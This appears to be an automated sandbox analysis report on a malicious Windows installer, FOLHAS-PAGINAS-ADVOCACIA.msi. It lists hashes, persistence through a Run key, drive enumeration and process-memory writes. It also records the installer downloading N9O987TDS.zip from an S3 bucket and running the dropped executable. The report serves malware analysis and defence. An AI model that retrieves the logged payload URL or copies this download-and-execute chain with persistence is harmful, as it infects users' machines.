Analysis
max time kernel: 74s
max time network: 116s
platform: windows7_x64
resource: win7-en-20210920
submitted: 23-09-2021 13:37

Static task: static1
Behavioral task: behavioral1
  Sample: FOLHAS-PAGINAS-ADVOCACIA.msi
  Resource: win7-en-20210920 (windows7_x64)
0 signatures, 0 seconds
General
Target: FOLHAS-PAGINAS-ADVOCACIA.msi
Size: 2.8MB
MD5: 8446fedeadab37c667b02dd7e0fdac26
SHA1: 04e9d8f6301946ae9a9fef977a5424f722fd9435
SHA256: f01cc28590e94c1af30ca919a93f2615285f6774f5fc6b7cd8f933fac3303203
SHA512: bfad67c71ac19a608cf03f93c18adb6d8073cc1deba149e8c0763a851c29de4a27064e36fb7a32bc5ffa82af3d45723d4ae34250f21526ef1853d92ef5362df1
Score: 8/10
Signatures

Blocklisted process makes network request (3 IoCs)
  flow 4, pid 1600, MsiExec.exe
  flow 6, pid 1600, MsiExec.exe
  flow 8, pid 1600, MsiExec.exe
Executes dropped EXE (2 IoCs)
  pid 1640, MSI2AA7.tmp
  pid 1768, N9O987TDS.exe
Loads dropped DLL (13 IoCs)
  pid 1600, MsiExec.exe (12 entries)
  pid 1768, N9O987TDS.exe (1 entry)
Adds Run key to start application (2 TTPs, 1 IoC)
  Key created by msiexec.exe: \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by msiexec.exe; each of the following drive letters appears twice in the log (24 letters x 2 = 48 entries):
  \??\A:, \??\B:, \??\E:, \??\F:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z:
Drops file in Windows directory (19 IoCs)
  File created by msiexec.exe:
    C:\Windows\Installer\2adec.ipi
    C:\Windows\Installer\2adea.msi
  File opened for modification by msiexec.exe:
    C:\Windows\Installer\MSI292E.tmp
    C:\Windows\Installer\MSI2A96.tmp
    C:\Windows\Installer\2adea.msi
    C:\Windows\Installer\MSIBD6F.tmp
    C:\Windows\Installer\MSI27A7.tmp
    C:\Windows\Installer\MSIB1A4.tmp
    C:\Windows\Installer\MSIBC93.tmp
    C:\Windows\Installer\2adec.ipi
    C:\Windows\Installer\MSIBB29.tmp
    C:\Windows\Installer\MSIBBA7.tmp
    C:\Windows\Installer\MSI2AA7.tmp
    C:\Windows\Installer\MSIB136.tmp
    C:\Windows\Installer\MSIB3A8.tmp
    C:\Windows\Installer\
    C:\Windows\Installer\MSIBA4D.tmp
    C:\Windows\Installer\MSIAEB5.tmp
    C:\Windows\Installer\MSIBA7D.tmp
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid 916, msiexec.exe (2 entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  pid 1544, msiexec.exe (31 entries, in logged order): SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
  pid 916, msiexec.exe (33 entries): SeSecurityPrivilege (1 entry), then SeRestorePrivilege and SeTakeOwnershipPrivilege alternating (16 entries each)
Suspicious use of FindShellTrayWindow (2 IoCs)
  pid 1544, msiexec.exe (2 entries)
Suspicious use of WriteProcessMemory (14 IoCs)
  PID 916 (msiexec.exe) wrote to memory of 1600, procid_target 28 (7 entries)
  PID 916 (msiexec.exe) wrote to memory of 1640, procid_target 32 (7 entries)
Processes

C:\Windows\system32\msiexec.exe
  Command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\FOLHAS-PAGINAS-ADVOCACIA.msi
  PID: 1544
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow

C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  PID: 916
  - Adds Run key to start application
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

    C:\Windows\syswow64\MsiExec.exe
      Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 0EC9DF812EA027A8D9129985DE29F146
      PID: 1600
      - Blocklisted process makes network request
      - Loads dropped DLL

    C:\Windows\Installer\MSI2AA7.tmp
      Command line: "C:\Windows\Installer\MSI2AA7.tmp" /DontWait "C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe"
      PID: 1640
      - Executes dropped EXE

C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe
  Command line: "C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe"
  PID: 1768
  - Executes dropped EXE
  - Loads dropped DLL
Network

DNS
  Remote address: 8.8.8.8:53
  Request: intermediari.s3.us-east-2.amazonaws.com IN A
  Response: intermediari.s3.us-east-2.amazonaws.com IN CNAME s3-r-w.us-east-2.amazonaws.com
            s3-r-w.us-east-2.amazonaws.com IN A 52.219.96.24

HTTP
  Remote address: 52.219.96.24:443
  Request:
    GET /N9O987TDS.zip HTTP/1.1
    Accept: */*
    User-Agent: AdvancedInstaller
    Host: intermediari.s3.us-east-2.amazonaws.com
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    x-amz-request-id: EAZZ5NRG1GNT8EX3
    Date: Thu, 23 Sep 2021 13:37:48 GMT
    Last-Modified: Tue, 21 Sep 2021 21:09:36 GMT
    ETag: "bcb214ddae34849b9fe721cde898f644"
    Accept-Ranges: bytes
    Content-Type: application/zip
    Server: AmazonS3
    Content-Length: 9144960

Flows
  (partially extracted row) 152 B 3
  52.219.96.24:443  https://intermediari.s3.us-east-2.amazonaws.com/N9O987TDS.zip  tls, http  MsiExec.exe  149.8kB  9.4MB  3245  6441
    HTTP Request: GET https://intermediari.s3.us-east-2.amazonaws.com/N9O987TDS.zip
    HTTP Response: 200